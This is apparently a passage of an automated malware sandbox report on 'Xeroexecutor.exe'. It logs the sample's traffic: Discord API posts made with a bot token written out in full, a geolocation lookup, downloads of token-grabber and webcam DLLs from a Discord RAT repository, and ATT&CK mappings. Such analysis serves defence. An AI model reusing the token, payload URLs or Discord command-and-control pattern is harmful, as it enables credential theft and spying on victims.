Set-Cookie: __sdcfduid=f181d76a0e0f11efb6b79ac70ff69aa5f0e09a6a2ccd5fe0edea1959d498408e6e9fd9d42fbd5775fee476eb4a9324f3; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=_6stMbfZGNtJeHtgtFb9NqukjykNIaUUXTzLq.f4tWI-1715264711133-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125b7b0ac77735-LHR
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:25:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=f1b5d7720e0f11ef8ac69a2afe861c28; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264713.003
x-ratelimit-reset-after: 1.625
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fYgpmitI9XGFTCOECvkpOA77LqT3aIuvGWvg0pGqiWcZDl8AmZOQQybcpcccv6TE%2BuOcmkUDDnt55xMQe9%2Bd%2BFtlO45gwrjvOXUUczNPIRSd48e5NquGAotuF5P"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=f1b5d7720e0f11ef8ac69a2afe861c2857829e51cb1a8c1ccb9eba97384b7b93537ca007483cd314cc7024e245d88471; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=sb7g7xGgB1ReIR8sSMdB6p1Sflw3U6y0o7NLYCBKE7I-1715264711474-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125b7d6fb0069e-LHR
POST

https://discord.com/api/v9/channels/1238134282950676521/messages

Xeroexecutor.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 14:25:26 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264727.003
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzwDyl4AN81y2GOqAcQJihZEunv5X2y%2BdytZW9W2oG7YpU7M03wmvu51L2FJLeT4WgiwCvuIwBUc8rGCEx4ocyl22aE0niSM6Y%2BDiINdaBjmuw8GOVP2t6UDzH0B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72e2386f67c32610e00fc96078c12b62436b198249c0fbecd8bbf7aa689ffd1681; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c1bf6e0aa6fe3bc4e575146062fcb7c960ea5867-1715264726; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CTf82cX6ERFRVnnpXT7cAN1cT5TgC0TS0Vgw5tH1x_c-1715264726185-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125bd85a89768c-LHR

162.159.135.234:443

https://gateway.discord.gg/?v=9&encording=json

tls, http

Xeroexecutor.exe

2.8kB
33.5kB
43
48

HTTP Request

GET https://gateway.discord.gg/?v=9&encording=json

HTTP Response

101
162.159.136.232:443

https://discord.com/api/v9/guilds/1237709600602722354/channels

tls, http

Xeroexecutor.exe

1.1kB
5.3kB
11
13

HTTP Request

POST https://discord.com/api/v9/guilds/1237709600602722354/channels

HTTP Response

201
159.89.102.253:443

https://geolocation-db.com/json/

tls, http

Xeroexecutor.exe

888 B
4.6kB
10
11

HTTP Request

GET https://geolocation-db.com/json

HTTP Response

301

HTTP Request

GET https://geolocation-db.com/json/

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.3kB
3.0kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

484.4kB
10.8kB
362
183

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.2kB
3.0kB
9
11

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

5.0kB
3.5kB
13
13

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.2kB
2.9kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
52.111.227.14:443

322 B
7
185.199.109.133:443

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

tls, http

Xeroexecutor.exe

60.8kB
3.0MB
1265
2164

HTTP Request

GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.1kB
2.9kB
8
9

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.2kB
2.9kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
185.199.109.133:443

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

tls, http

Xeroexecutor.exe

1.5kB
43.3kB
20
36

HTTP Request

GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.2kB
3.0kB
9
11

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.2kB
3.0kB
9
11

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1238134282950676521/messages

tls, http

Xeroexecutor.exe

1.2kB
2.9kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1238134282950676521/messages

HTTP Response

200

8.8.8.8:53

gateway.discord.gg

dns

Xeroexecutor.exe

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.135.234

162.159.133.234

162.159.130.234

162.159.136.234

162.159.134.234
8.8.8.8:53

discord.com

dns

Xeroexecutor.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.137.232

162.159.135.232

162.159.138.232

162.159.128.233
8.8.8.8:53

234.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.135.159.162.in-addr.arpa
8.8.8.8:53

geolocation-db.com

dns

Xeroexecutor.exe

64 B
80 B
1
1

DNS Request

geolocation-db.com

DNS Response

159.89.102.253
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa
8.8.8.8:53

253.102.89.159.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

253.102.89.159.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

Xeroexecutor.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.108.133

185.199.110.133
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2676-0-0x00000281E93F0000-0x00000281E9408000-memory.dmp

Filesize
96KB

Download
memory/2676-1-0x00007FFA5EE13000-0x00007FFA5EE14000-memory.dmp

Filesize
4KB

Download
memory/2676-2-0x00000281EBAB0000-0x00000281EBC72000-memory.dmp

Filesize
1.8MB

Download
memory/2676-3-0x00007FFA5EE10000-0x00007FFA5F7FC000-memory.dmp

Filesize
9.9MB

Download
memory/2676-4-0x00000281EC3B0000-0x00000281EC8D6000-memory.dmp

Filesize
5.1MB

Download
memory/2676-5-0x00007FFA5EE13000-0x00007FFA5EE14000-memory.dmp

Filesize
4KB

Download
memory/2676-6-0x00007FFA5EE10000-0x00007FFA5F7FC000-memory.dmp

Filesize
9.9MB

Download
memory/2676-7-0x00000281EBE80000-0x00000281EC14A000-memory.dmp

Filesize
2.8MB

Download
memory/2676-8-0x00000281EB000000-0x00000281EB00E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.